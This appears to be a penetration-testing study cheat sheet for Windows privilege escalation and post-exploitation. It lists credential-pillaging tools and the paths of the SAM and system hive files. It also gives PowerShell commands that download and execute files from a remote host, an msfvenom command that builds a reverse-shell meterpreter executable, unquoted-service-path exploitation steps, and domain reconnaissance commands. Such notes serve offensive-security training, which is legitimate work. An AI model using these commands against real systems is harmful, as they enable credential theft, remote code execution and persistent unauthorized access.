Version of windows

winver.exe
msinfo32.exe

AnasAboureada/Penetration-Testing-Study-Notes

Automated Scripts

post/windows/gather #Metasploit pillaging module
scraper #Metasploit automatic pillaging script. Harvests system information, including network shares, registry hives, and password hashes.
Sherlock.ps1 (deprecated)
Watson
Windows-exploit-suggester-next generation
winenum #Metasploit automatic pillaging script. Retrieves information about the system, including environmental variables, network interfaces routing, user accounts etc.
powersploit
Empire

Files of Interest

%SYSTEMROOT%\\ System32\\config \\SAM
%SYSTEMROOT%\\repair\\SAM
%SYSTEMROOT%\\repair\\system
%SYSTEMROOT%\\System32\\config \\SAM
%SYSTEMROOT%\\System32\\config\\RegBack\\SAM
%SYSTEMROOT%\\System32\\config\\RegBack\\system

#Check write permissions of files and folders
Icacls <folder> 

#Display the resources shared on the victim
net share 

#Run file using powershell
Powershell.exe -c ((new-object System.Net.WebClient).DownloadFile('<http://www.xyz.net/file.txt','C:\\tmp\\file.txt>')) 

Powershell.exe -c IEX(New-Object Net.WebClient).downloadString(‘<http://10.10.16.135/41020.exe’>)

#Create simple http file server that can be accessed by the target.
Python –m SimpleHTTPServer 8080 

# Is ubuntu.exe or bash.exe installed on a Windows machine? Could this mean a Windows Subsystem for Linux is installed?
# If so, bash.exe can be run inside windows, and give root access. 

Unquoted Service Paths

List all services wtih an unquoted service path.

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\\Windows\\\\" |findstr /i /v """

1. If this is true, check the permisions on each direcy in the path: icacls "C:\\Program Files\\Some Software\\"
2. Create a malicious .exe that sends a reverse shell to your machine (assuming no antivirus) msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[attack machine] LPORT=443 -f exe -o servicename.exe
3. Restart the service: sc stop [service name] sc start [service name]

Metasploit: exploit/windows/local/trusted_service_path

Permissions

Network

net group "Domain Controllers" /domain #Print the list of domain controllers
net view /domain #Check if the machine if part of a domain, or is the domain controller.
Netsh firewall show config
Netsh firewall show state #Firewall settings
Netstat –ano #Allows us to display all the host connections, listening ports, established connections, etc and the processes associated with each of these connections.